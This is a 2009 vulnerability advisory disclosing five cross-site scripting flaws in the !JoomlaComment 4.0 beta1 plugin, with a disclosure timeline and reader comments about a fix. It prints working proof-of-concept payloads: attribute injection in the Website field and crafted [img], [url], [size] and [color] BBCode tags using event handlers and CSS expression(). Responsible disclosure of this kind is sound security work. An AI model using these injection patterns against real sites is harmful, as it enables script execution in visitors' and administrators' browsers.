Thursday, 17 September 2009 00:00

!JoomlaComment 4.0 beta1, a commenting plugin, suffers from multiple XSS vulnerabilities.

  1. Website Input XSS

    The 'Website' input field is checked for html markup, but fails to sanitize extra parameters.
    ' onmouseover='alert(String.fromCharCode(88,83,83))
    ' style='color:expression(alert(String.fromCharCode(88,83,83)))
  2. [img] BBCode Tag XSS

    [img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
  3. [url] BBCode Tag XSS

    [url=http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))]XSS[/url]
  4. [size] BBCode Tag XSS

    [size=large;color:expression(alert(String.fromCharCode(88,83,83)))]XSS[/size]
    This XSS vulnerability executes in the administrator area as well.
  5. [color] BBCode Tag XSS

    [color=red;font-size:expression(alert(String.fromCharCode(88,83,83)))]XSS[/color]
    This XSS vulnerability executes in the administrator area as well.

Timeline

  • Vulnerabilities Discovered: 31 July 2009
  • Vendor Notified: 31 July 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:36
 
Comments (3)
1 Wednesday, 25 November 2009 20:02
Adrian S
Hey there,

Thanks for posting this. I discovered it via the Vulnerable Extensions List. I noticed that this is for version 4.0 Beta version 1. I'm currently using Version 4.0 Beta Version 2. Any idea if the problem has been corrected in the current build?
2 Wednesday, 25 November 2009 20:04
Jeff Channell
I'm not sure if it was fixed or not - I never received any response from the vendor.

Sorry I can't be more helpful than that!
3 Friday, 29 January 2010 06:47
Daniel Dimitrov
The latest release !joomlacomment RC1 fixes this problem. More information here:

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions